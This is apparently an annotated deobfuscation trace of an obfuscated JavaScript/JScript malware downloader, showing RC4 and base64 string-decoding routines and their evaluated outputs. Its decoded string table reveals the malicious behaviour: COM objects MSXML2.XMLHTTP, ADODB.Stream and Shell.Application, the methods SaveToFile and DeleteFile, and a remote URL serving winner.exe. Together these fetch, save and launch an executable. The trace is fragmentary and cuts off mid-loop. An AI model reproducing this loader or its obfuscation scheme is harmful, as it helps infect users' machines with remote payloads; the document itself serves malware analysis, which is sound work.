                                                                                                                      • _0x38e1(182,"qU$2") ➔ "\xd1\xfd\x89$c }=\xd08\xc0.6\x90\xb2\x06a\x9bp\x97\xb8t\xd1:a\xa0"
                                                                                                                      • _0x38e1(199,"kXe)") ➔ undefined
                                                                                                                      • _0x38e1(199,"kXe)") ➔ "\xb7\x841\x1a$\x8d"
        _0x10bd08 = _0x10bd08 - 0x99;
        var _0x347c9 = _0x33f15e[_0x10bd08];
        if ( _0x38e1['SqCPhv'] === undefined )
        {
            var _0x258f3e = function (_0x3b2cb8) {
                                                                                                                              • _0x258f3e("51926vemoDJ") ➔ undefined
                                                                                                                              • _0x258f3e("gM3dJZ48WOy8WOFdMsZdQCkaW7S") ➔ "\x1am\xcf><\x86<\x87\xd9,\xe9\x80\xfb"
                                                                                                                              • _0x258f3e("WR7cMfrp") ➔ "\xbe\x98TO"
                                                                                                                              • _0x258f3e("172CBHuQO") ➔ undefined
                                                                                                                              • _0x258f3e("rmkoj8oa") ➔ "D\x8e'\xc0"
                                                                                                                              • _0x258f3e("W5BcVetcV8osW7zdW68") ➔ "\xd6\xbcD\xbf\xd2\xf6C\xef"
                                                                                                                              • _0x258f3e("WPZdJwWYW5RcT3RdGGGnlgBcSq") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                              • _0x258f3e("mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa") ➔ "1\xbf\x16h\x91\xc0\H]\xadS\xa9^WU\xf6\x14 \xaaQQ|nZ\\xe4"
                                                                                                                              • _0x258f3e("Open") ➔ undefined
                                                                                                                              • _0x258f3e("WPNdVhRcR8kzWQK") ➔ "\x99\xfcz\xaf\x99\xa9"
                var _0x32cdc4 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                var _0x47ccc1 = '', _0x5a3746 = '';
                for ( var _0x50911e = 0x0, _0x345b34, _0x4f764a, _0x21d3ac = 0x0 ; _0x4f764a = _0x3b2cb8['charAt'] ( _0x21d3ac ++ ) ; ~ _0x4f764a && ( _0x345b34 = _0x50911e % 0x4 ? _0x345b34 * 0x40 + _0x4f764a : _0x4f764a, _0x50911e ++ % 0x4 ) ? _0x47ccc1 += String['fromCharCode'] ( 0xff & _0x345b34 >> ( - 0x2 * _0x50911e & 0x6 ) ) : 0x0 )
                {
                    _0x4f764a = _0x32cdc4['indexOf'] ( _0x4f764a );
                }
                for ( var _0x8d1f9c = 0x0, _0x12991c = _0x47ccc1['length'] ; _0x8d1f9c < _0x12991c ; _0x8d1f9c ++ )
                {
                    _0x5a3746 += '%' + ( '00' + _0x47ccc1['charCodeAt'] ( _0x8d1f9c ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                }
                return decodeURIComponent ( _0x5a3746 );
                                                                                                                                                  • decodeURIComponent("%e7%5f%76%e9%51%0c%39%d8") ➔ undefined
                                                                                                                                                  • decodeURIComponent("%1a%6d%c3%8f%3e%3c%c2%86%3c%c2%87%c3%99%2c%c3%a9%c2%80%c3%bb") ➔ "\x1am\xcf><\x86<\x87\xd9,\xe9\x80\xfb"
                                                                                                                                                  • decodeURIComponent("%c2%be%c2%98%54%4f") ➔ "\xbe\x98TO"
                                                                                                                                                  • decodeURIComponent("%d7%bd%9c%6e%15%2a") ➔ undefined
                                                                                                                                                  • decodeURIComponent("%44%c2%8e%27%c3%80") ➔ "D\x8e'\xc0"
                                                                                                                                                  • decodeURIComponent("%c3%96%c2%bc%44%c2%bf%c3%92%c3%b6%43%c3%af") ➔ "\xd6\xbcD\xbf\xd2\xf6C\xef"
                                                                                                                                                  • decodeURIComponent("%c2%9c%c3%8d%6c%32%c3%9a%c2%b7%7a%c3%82%08%0d%2c%66%c2%b1") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                  • decodeURIComponent("%31%c2%bf%16%68%c2%91%c3%80%5c%48%5d%c2%ad%53%c2%a9%5e%57%55%c3%b6%14%0a%c2%aa%51%51%7c%6e%5a%5c%c3%a4") ➔ "1\xbf\x16h\x91\xc0\H]\xadS\xa9^WU\xf6\x14 \xaaQQ|nZ\\xe4"
                                                                                                                                                  • decodeURIComponent("%a0%f1%0d") ➔ undefined
                                                                                                                                                  • decodeURIComponent("%c2%99%c3%bc%7a%c2%af%c2%99%c2%a9") ➔ "\x99\xfcz\xaf\x99\xa9"
                                                                                                                                                  47
                                                                                                                                                  };
                                                                                                                                                    48
            var _0x38e19a = function (_0x2f9be2, _0x3a7298) {
            • function (_0x10bd08, _0x516731).pBljEK("51926vemoDJ","kXe)") ➔ undefined
            • function (_0x10bd08, _0x516731).pBljEK("gM3dJZ48WOy8WOFdMsZdQCkaW7S","kXe)") ➔ "4\x15\x84\x8b\x81\xa2\x15n \xed\x02Y\xca"
            • function (_0x10bd08, _0x516731).pBljEK("WR7cMfrp","N1]M") ➔ "n\xfaf\xc0"
            • function (_0x10bd08, _0x516731).pBljEK("172CBHuQO","LA#Q") ➔ undefined
            • function (_0x10bd08, _0x516731).pBljEK("rmkoj8oa","kXe)") ➔ "j\xf6lu"
            • function (_0x10bd08, _0x516731).pBljEK("W5BcVetcV8osW7zdW68","N1]M") ➔ "\x06\xdev0o~V\xd9"
            • function (_0x10bd08, _0x516731).pBljEK("WPZdJwWYW5RcT3RdGGGnlgBcSq","LA#Q") ➔ "\xd5\xb2\x89\xa6\x81\xaf\xdf\x8a%\x97\xec\xd0`"
            • function (_0x10bd08, _0x516731).pBljEK("mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa","qU$2") ➔ "\xd1\xfd\x89$c }=\xd08\xc0.6\x90\xb2\x06a\x9bp\x97\xb8t\xd1:a\xa0"
            • function (_0x10bd08, _0x516731).pBljEK("Open","kXe)") ➔ undefined
            • function (_0x10bd08, _0x516731).pBljEK("WPNdVhRcR8kzWQK","kXe)") ➔ "\xb7\x841\x1a$\x8d"
                var _0x5410d1 = [], _0xe1f1d8 = 0x0, _0x5cb8e6, _0x3001a4 = '';
                _0x2f9be2 = _0x258f3e ( _0x2f9be2 );
                • _0x258f3e("51926vemoDJ") ➔ undefined
                • _0x258f3e("gM3dJZ48WOy8WOFdMsZdQCkaW7S") ➔ "\x1am\xcf><\x86<\x87\xd9,\xe9\x80\xfb"
                • _0x258f3e("WR7cMfrp") ➔ "\xbe\x98TO"
                • _0x258f3e("172CBHuQO") ➔ undefined
                • _0x258f3e("rmkoj8oa") ➔ "D\x8e'\xc0"
                • _0x258f3e("W5BcVetcV8osW7zdW68") ➔ "\xd6\xbcD\xbf\xd2\xf6C\xef"
                • _0x258f3e("WPZdJwWYW5RcT3RdGGGnlgBcSq") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                • _0x258f3e("mCk/fMJcKCoaxeHDWQ1tWQLEv1xdTHqkWQPruxXUwLZdPa") ➔ "1\xbf\x16h\x91\xc0\H]\xadS\xa9^WU\xf6\x14 \xaaQQ|nZ\\xe4"
                • _0x258f3e("Open") ➔ undefined
                • _0x258f3e("WPNdVhRcR8kzWQK") ➔ "\x99\xfcz\xaf\x99\xa9"
                var _0x198f8b;
                for ( _0x198f8b = 0x0 ; _0x198f8b < 0x100 ; _0x198f8b ++ )
                {
                    _0x5410d1[_0x198f8b] = _0x198f8b;
                }
                for ( _0x198f8b = 0x0 ; _0x198f8b < 0x100 ; _0x198f8b ++ )
                {
                    _0xe1f1d8 = ( _0xe1f1d8 + _0x5410d1[_0x198f8b] + _0x3a7298['charCodeAt'] ( _0x198f8b % _0x3a7298['length'] ) ) % 0x100, _0x5cb8e6 = _0x5410d1[_0x198f8b], _0x5410d1[_0x198f8b] = _0x5410d1[_0xe1f1d8], _0x5410d1[_0xe1f1d8] = _0x5cb8e6;
                }
                _0x198f8b = 0x0, _0xe1f1d8 = 0x0;
                for ( var _0x446218 = 0x0 ; _0x446218 < _0x2f9be2['length'] ; _0x446218 ++ )
                {
                    _0x198f8b = ( _0x198f8b + 0x1 ) % 0x100, _0xe1f1d8 = ( _0xe1f1d8 + _0x5410d1[_0x198f8b] ) % 0x100, _0x5cb8e6 = _0x5410d1[_0x198f8b], _0x5410d1[_0x198f8b] = _0x5410d1[_0xe1f1d8], _0x5410d1[_0xe1f1d8] = _0x5cb8e6, _0x3001a4 += String['fromCharCode'] ( _0x2f9be2['charCodeAt'] ( _0x446218 ) ^ _0x5410d1[( _0x5410d1[_0x198f8b] + _0x5410d1[_0xe1f1d8] ) % 0x100] );
                }
                return _0x3001a4;
            };
            _0x38e1['pBljEK'] = _0x38e19a, _0x11a177 = arguments, _0x38e1['SqCPhv'] = ! ! [];
        }
        var _0x46ba6b = _0x33f15e[0x0], _0x1fc55f = _0x10bd08 + _0x46ba6b, _0x2aa686 = _0x11a177[_0x1fc55f];
        return ! _0x2aa686 ? ( _0x38e1['dNIkIW'] === undefined && ( _0x38e1['dNIkIW'] = ! ! [] ), _0x347c9 = _0x38e1['pBljEK'] ( _0x347c9, _0x516731 ), _0x11a177[_0x1fc55f] = _0x347c9 ) : _0x347c9 = _0x2aa686, _0x347c9;
    }, _0x38e1 ( _0x11a177, _0x26656a );
}
var _0x1f863f = _0x31b8, _0x406710 = _0x3dc1;
function _0x3dc1(_0x4f764a, _0x21d3ac) {
• _0x3dc1(513,"0zEZ") ➔ undefined
• _0x3dc1(513,"0zEZ") ➔ undefined
• _0x3dc1(513,"0zEZ") ➔ "i\x05V"
• _0x3dc1(509,"3o8g") ➔ undefined
• _0x3dc1(513,"0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
• _0x3dc1(509,"3o8g") ➔ undefined
• _0x3dc1(513,"0zEZ") ➔ undefined
• _0x3dc1(513,"0zEZ") ➔ undefined
• _0x3dc1(513,"0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
• _0x3dc1(509,"3o8g") ➔ "GET"
    var _0x8d1f9c = _0x4495 ( );
                                                                                                                                                                                                  • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
    return _0x3dc1 =
    function (_0x12991c, _0x2f9be2) {
                                                                                                                                                                                                    var _0x4157dc = _0x38e1, _0x1cea0e = _0x10bd;
                                                                                                                                                                                                      _0x12991c = _0x12991c - 0x1e8;
                                                                                                                                                                                                        var _0x3a7298 = _0x8d1f9c[_0x12991c];
                                                                                                                                                                                                          if ( _0x3dc1['xEylaY'] === undefined )
                                                                                                                                                                                                            {
                                                                                                                                                                                                              var _0x5410d1 = function (_0x446218) {
                                                                                                                                                                                                              • _0x5410d1("DeleteFile") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("438285eiwTzG") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                              • _0x5410d1("https://hirosguide.hu/ti/winner.exe") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("WPZdJwWYW5RcT3RdGGGnlgBcSq") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                                                                              • _0x5410d1("Open") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("891608JWBVoS") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("Close") ➔ undefined
                                                                                                                                                                                                              • _0x5410d1("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa") ➔ "\xbeZS=o\x88\xa9\xdb\x1f$Y\xb1\xea\x800\x88b\xbf\x8e\x92\xc0h\xc5\xa81|"
                                                                                                                                                                                                              • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                              var _0x3bbb8a = _0x10bd, _0x4781c3 = _0x38e1, _0x318336 = _0x4781c3 ( 0xcd, 'oC51' ), _0x4610ab = '', _0x33424c = '';
                                                                                                                                                                                                              • _0x4781c3(205,"oC51") ➔ "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/="
                                                                                                                                                                                                              for ( var _0x409d8b = 0x0, _0x9a4e6c, _0x5a04e3, _0x582bf6 = 0x0 ; _0x5a04e3 = _0x446218[_0x4781c3 ( 0xa4, '6[Et' ) ] ( _0x582bf6 ++ ) ; ~ _0x5a04e3 && ( _0x9a4e6c = _0x409d8b % 0x4 ? _0x9a4e6c * 0x40 + _0x5a04e3 : _0x5a04e3, _0x409d8b ++ % 0x4 ) ? _0x4610ab += String['fromCharCode'] ( 0xff & _0x9a4e6c >> ( - 0x2 * _0x409d8b & 0x6 ) ) : 0x0 )
                                                                                                                                                                                                              • _0x4781c3(164,"6[Et") ➔ "charAt"
                                                                                                                                                                                                              {
                                                                                                                                                                                                                _0x5a04e3 = _0x318336[_0x3bbb8a ( 0xad ) ] ( _0x5a04e3 );
                                                                                                                                                                                                                • _0x3bbb8a(173) ➔ "indexOf"
                                                                                                                                                                                                                }
                                                                                                                                                                                                                  for ( var _0x5a46f3 = 0x0, _0x2540b3 = _0x4610ab['length'] ; _0x5a46f3 < _0x2540b3 ; _0x5a46f3 ++ )
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                      _0x33424c += '%' + ( '00' + _0x4610ab[_0x4781c3 ( 0xd5, '&U@C' ) ] ( _0x5a46f3 ) ['toString'] ( 0x10 ) )[_0x4781c3 ( 0xd3, 'uW23' ) ] ( - 0x2 );
                                                                                                                                                                                                                      • _0x4781c3(213,"&U@C") ➔ "charCodeAt"
                                                                                                                                                                                                                      • _0x4781c3(211,"uW23") ➔ "slice"
                                                                                                                                                                                                                      }
                                                                                                                                                                                                                        return decodeURIComponent ( _0x33424c );
                                                                                                                                                                                                                        • decodeURIComponent("%74%42%c4%4c%47%c8%2c") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%e3%7f%36%f3%91%08%5a%d6%60") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%21%c3%b0%c2%a2") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                        • decodeURIComponent("%1d%34%cf%4b%ff%c7%21%13%92%19%42%03%10%75%3f%4c%8f%d6%20%d3%44%44%45%c4") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%c2%9c%c3%8d%6c%32%c3%9a%c2%b7%7a%c3%82%08%0d%2c%66%c2%b1") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                                                                                        • decodeURIComponent("%a0%f1%0d") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%f3%dd%7a%d3%c8%f0%6e%f3%ac") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%70%b3%92") ➔ undefined
                                                                                                                                                                                                                        • decodeURIComponent("%c2%be%5a%53%3d%6f%c2%88%c2%a9%c3%9b%1f%24%59%c2%b1%c3%aa%c2%80%30%c2%88%62%c2%bf%c2%8e%c2%92%c3%80%68%c3%85%c2%a8%31%7c") ➔ "\xbeZS=o\x88\xa9\xdb\x1f$Y\xb1\xea\x800\x88b\xbf\x8e\x92\xc0h\xc5\xa81|"
                                                                                                                                                                                                                        • decodeURIComponent("%21%c3%b0%c2%a2") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                        },
                                                                                                                                                                                                                          _0xe1f1d8 = function (_0x4281c2, _0xf5bb28) {
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("DeleteFile","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("438285eiwTzG","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("https://hirosguide.hu/ti/winner.exe","3o8g") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WPZdJwWYW5RcT3RdGGGnlgBcSq","0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Open","3o8g") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("891608JWBVoS","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Close","0zEZ") ➔ undefined
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa","0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","3o8g") ➔ "GET"
                                                                                                                                                                                                                          var _0x11181f = _0x10bd, _0x312d50 = _0x38e1, _0xe93937 = [], _0x255cdd = 0x0, _0x1f0222, _0x512427 = '';
                                                                                                                                                                                                                            _0x4281c2 = _0x5410d1 ( _0x4281c2 );
                                                                                                                                                                                                                            • _0x5410d1("DeleteFile") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("438285eiwTzG") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                            • _0x5410d1("https://hirosguide.hu/ti/winner.exe") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("WPZdJwWYW5RcT3RdGGGnlgBcSq") ➔ "\x9c\xcdl2\xda\xb7z\xc2\x08 ,f\xb1"
                                                                                                                                                                                                                            • _0x5410d1("Open") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("891608JWBVoS") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("Close") ➔ undefined
                                                                                                                                                                                                                            • _0x5410d1("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa") ➔ "\xbeZS=o\x88\xa9\xdb\x1f$Y\xb1\xea\x800\x88b\xbf\x8e\x92\xc0h\xc5\xa81|"
                                                                                                                                                                                                                            • _0x5410d1("iCoWWQi") ➔ "!\xf0\xa2"
                                                                                                                                                                                                                            var _0x19a55c;
                                                                                                                                                                                                                              for ( _0x19a55c = 0x0 ; _0x19a55c < 0x100 ; _0x19a55c ++ )
                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                  _0xe93937[_0x19a55c] = _0x19a55c;
                                                                                                                                                                                                                                    }
                                                                                                                                                                                                                                      for ( _0x19a55c = 0x0 ; _0x19a55c < 0x100 ; _0x19a55c ++ )
                                                                                                                                                                                                                                        {
                                                                                                                                                                                                                                          _0x255cdd = ( _0x255cdd + _0xe93937[_0x19a55c] + _0xf5bb28[_0x312d50 ( 0xc3, '*CwY' ) ] ( _0x19a55c % _0xf5bb28[_0x312d50 ( 0xb4, 'Kbvm' ) ] ) ) % 0x100, _0x1f0222 = _0xe93937[_0x19a55c], _0xe93937[_0x19a55c] = _0xe93937[_0x255cdd], _0xe93937[_0x255cdd] = _0x1f0222;
                                                                                                                                                                                                                                          • _0x312d50(195,"*CwY") ➔ "charCodeAt"
                                                                                                                                                                                                                                          • _0x312d50(180,"Kbvm") ➔ "length"
                                                                                                                                                                                                                                          }
                                                                                                                                                                                                                                            _0x19a55c = 0x0, _0x255cdd = 0x0;
                                                                                                                                                                                                                                              for ( var _0x705753 = 0x0 ; _0x705753 < _0x4281c2[_0x11181f ( 0xc6 ) ] ; _0x705753 ++ )
                                                                                                                                                                                                                                              • _0x11181f(198) ➔ "length"
                                                                                                                                                                                                                                              {
                                                                                                                                                                                                                                                _0x19a55c = ( _0x19a55c + 0x1 ) % 0x100, _0x255cdd = ( _0x255cdd + _0xe93937[_0x19a55c] ) % 0x100, _0x1f0222 = _0xe93937[_0x19a55c], _0xe93937[_0x19a55c] = _0xe93937[_0x255cdd], _0xe93937[_0x255cdd] = _0x1f0222, _0x512427 += String['fromCharCode'] ( _0x4281c2[_0x312d50 ( 0xd2, 'z&ot' ) ] ( _0x705753 ) ^ _0xe93937[( _0xe93937[_0x19a55c] + _0xe93937[_0x255cdd] ) % 0x100] );
                                                                                                                                                                                                                                                • _0x312d50(210,"z&ot") ➔ "charCodeAt"
                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                  return _0x512427;
                                                                                                                                                                                                                                                    };
                                                                                                                                                                                                                                                      _0x3dc1[_0x1cea0e ( 0xc5 ) ] = _0xe1f1d8, _0x4f764a = arguments, _0x3dc1[_0x4157dc ( 0x9e, '97o1' ) ] = ! ! [];
                                                                                                                                                                                                                                                      • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                      • _0x4157dc(158,"97o1") ➔ "xEylaY"
                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                        var _0x5cb8e6 = _0x8d1f9c[0x0], _0x3001a4 = _0x12991c + _0x5cb8e6, _0x198f8b = _0x4f764a[_0x3001a4];
                                                                                                                                                                                                                                                          return ! _0x198f8b ? ( _0x3dc1[_0x1cea0e ( 0xb9 ) ] === undefined && ( _0x3dc1[_0x4157dc ( 0xaa, 'CsYt' ) ] = ! ! [] ), _0x3a7298 = _0x3dc1[_0x1cea0e ( 0xc5 ) ] ( _0x3a7298, _0x2f9be2 ), _0x4f764a[_0x3001a4] = _0x3a7298 ) : _0x3a7298 = _0x198f8b, _0x3a7298;
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("DeleteFile","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("438285eiwTzG","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("https://hirosguide.hu/ti/winner.exe","3o8g") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WPZdJwWYW5RcT3RdGGGnlgBcSq","0zEZ") ➔ "\xd48\x98\x8d\xb5\x90\xd6\xad\x90\x85\x92>S"
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Open","3o8g") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("891608JWBVoS","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("Close","0zEZ") ➔ undefined
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa","0zEZ") ➔ "\xf6\xaf\xa7\x82\x00\xaf\x05\xb4\x87\xac\xe7\xe9\x08 \x0f\xb8\x83\x90\xa7\x7f\x92\x1a\xd6\xe5\xaf\xb7"
                                                                                                                                                                                                                                                          • _0x1cea0e(185) ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x4157dc(170,"CsYt") ➔ "jjEhYu"
                                                                                                                                                                                                                                                          • _0x1cea0e(197) ➔ "pAZheY"
                                                                                                                                                                                                                                                          • function (_0x12991c, _0x2f9be2).pAZheY("iCoWWQi","3o8g") ➔ "GET"
                                                                                                                                                                                                                                                          }, _0x3dc1 ( _0x4f764a, _0x21d3ac );
                                                                                                                                                                                                                                                            }
                                                                                                                                                                                                                                                              ( function (_0x1ca879, _0x2c796b) {
                                                                                                                                                                                                                                                              • (function _0x4495(),289452) ➔ undefined
                                                                                                                                                                                                                                                              • (function _0x4495(),289452) ➔ undefined
                                                                                                                                                                                                                                                              var _0x30bab5 = _0x10bd, _0x11be6c = _0x38e1, _0x31cc7d = _0x31b8, _0x3cfdf4 = _0x3dc1, _0x136e36 = _0x1ca879 ( );
                                                                                                                                                                                                                                                              • _0x4495() ➔ Shell.Application,ADODB.Stream,pfOEWQ0,vmkcW4hcIJeMubjeBCo9,FvRdQKKo,cSoQW7HWyKGYW5pcGCokiSk7,12775480EBnljO,F8kCWOxdSH1PW4e,W5BcVetcV8osW7zdW68,CreateObject,Scripting.FileSystemObject,45obifie,MSXML2.XMLHTTP,b8kDW4nLumkfwrG,tHKTWPXJW6aHEvJcUYmH,gM3dJZ48WOy8WOFdMsZdQCkaW7S,SaveToFile,W7mUrSkZ,Type,whGqWOWIpCkIW71DWQruaW,dmoHW7v3BKGbW6/cMSoQpSk/,2383633jjSiic,Send,https://hirosguide.hu/ti/winner.exe,Open,DeleteFile,438285eiwTzG,iCoWWQi,WPZdJwWYW5RcT3RdGGGnlgBcSq,891608JWBVoS,Close,WR5AuZ1VWOJcQCoBhYrzWRhdQSkammkiySk/WO7cKSoaAmofWQGXFa,W5RcOGxcPSoyWO3dSqG,tCk1WPiAW7/dOb3dQG
                                                                                                                                                                                                                                                              while (! ! [ ] )
                                                                                                                                                                                                                                                                {
                                                                                                                                                                                                                                                                  try
                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                      var _0x419b7e = - parseInt ( _0x3cfdf4 ( 0x201, '0zEZ' ) ) / 0x1 * ( parseInt ( _0x3cfdf4 ( 0x1fd, '3o8g' ) ) / 0x2 ) + - parseInt ( _0x31cc7d ( 0x1f2 ) ) / 0x3 + parseInt ( _0x3cfdf4 ( 0x1f8, _0x11be6c ( 0xa8, 'H9oj' ) ) ) / 0x4 * ( - parseInt ( _0x3cfdf4 ( 0x1ff, _0x11be6c ( 0xce, 'oC51' ) ) ) / 0x5 ) + - parseInt ( _0x3cfdf4 ( 0x1f4, _0x30bab5 ( 0xbb ) ) ) / 0x6 + parseInt ( _0x31cc7d ( 0x1ed ) ) / 0x7 + - parseInt ( _0x31cc7d ( 0x1f5 ) ) / 0x8 * ( parseInt ( _0x3cfdf4 ( 0x207, _0x30bab5 ( 0xc2 ) ) ) / 0x9 ) + parseInt ( _0x31cc7d ( 0x200 ) ) / 0xa;
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ undefined
                                                                                                                                                                                                                                                                      • _0x3dc1(513,"0zEZ") ➔ "i\x05V"
                                                                                                                                                                                                                                                                      • parseInt("i\x05V") ➔ NaN
                                                                                                                                                                                                                                                                      • _0x3dc1(509,"3o8g") ➔ undefined
